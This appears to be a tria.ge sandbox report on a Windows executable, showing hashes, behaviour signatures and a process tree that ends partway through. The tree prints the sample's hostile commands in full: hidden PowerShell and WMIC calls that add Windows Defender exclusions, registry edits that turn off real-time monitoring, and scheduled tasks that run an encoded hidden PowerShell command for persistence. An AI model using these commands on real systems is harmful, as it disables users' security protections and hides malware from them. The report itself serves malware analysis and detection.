Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    241s
  • max time network
    242s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    04/07/2024, 22:31

General

  • Target

    10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe

  • Size

    7.3MB

  • MD5

    c2df41992227f86b379c86fd50163bb6

  • SHA1

    3e21789c16009856e163810185bf1c59c111e5e2

  • SHA256

    10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733

  • SHA512

    7778aa741ec19f3092dca2ad2303f946e949db0f5e538938914fae0004a2718c4ec705c962810d3aab4e9e887598c30a48204a7ad181e117583131882627629d

  • SSDEEP

    196608:91OG1qxZQHVAj+aBt4P81+pgdwBtQ5Eck5++QI:3OG1EZiVRC4PucBBK5t+QI

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe
    "C:\Users\Admin\AppData\Local\Temp\10edc85ba055a5f15882fa647839a4a1072005e38e8b80297032077d6afd6733.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Users\Admin\AppData\Local\Temp\7zS1536.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:300
      • C:\Users\Admin\AppData\Local\Temp\7zS1748.tmp\Install.exe
        .\Install.exe /LRcdRdidhE "385137" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3056
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1752
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2728
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2632
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 22:33:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exe\" 2Z /pVhdidkiM 385137 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1756
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2952
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {12E32273-BE7A-4843-AFA1-0A36F4594A46} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exe
      C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\cbFljeS.exe 2Z /pVhdidkiM 385137 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gULQLywNe" /SC once /ST 01:40:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2068
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gULQLywNe"
        3⤵
          PID:1748
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gULQLywNe"
          3⤵
            PID:408
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:1348
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1544
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:1888
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:540
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gMNXdmbhe" /SC once /ST 04:06:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1892
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gMNXdmbhe"
                3⤵
                  PID:1876
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gMNXdmbhe"
                  3⤵
                    PID:1276
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:2612
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:1884
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1820
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2704
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2724
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:2692
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:2516
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:2576
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2632
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2656
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2568
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2752
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\sFyaDrJXZzAeWCdu\rdvKBuDl\DRyIBDXNfAXlymWW.wsf"
                                    3⤵
                                      PID:2856
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\sFyaDrJXZzAeWCdu\rdvKBuDl\DRyIBDXNfAXlymWW.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2596
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2272
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:308
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2836
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2884
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:3044
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2292
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2588
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1152
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2580
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2144
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1852
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2888
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2680
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1664
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2092
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2236
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2840
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:532
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2492
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:380
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:2948
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:3060
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:320
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2344
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1528
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2376
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:1716
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1344
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1928
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1864
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:1848
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2220
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1932
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1044
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:892
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:2440
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gsAKBYLZy" /SC once /ST 06:36:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2212
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gsAKBYLZy"
                                                                          3⤵
                                                                            PID:1576
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gsAKBYLZy"
                                                                            3⤵
                                                                              PID:2736
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2772
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2532
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2776
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2656
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 14:39:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exe\" WB /tqfRdidxm 385137 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3064
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "KdMGsZYUagVlNoZLt"
                                                                                      3⤵
                                                                                        PID:2728
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 484
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2688
                                                                                    • C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exe
                                                                                      C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\PpZzsTE.exe WB /tqfRdidxm 385137 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1292
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bsqNJSiTyoMLfdbIdy"
                                                                                        3⤵
                                                                                          PID:2560
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:808
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:1640
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2588
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2508
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
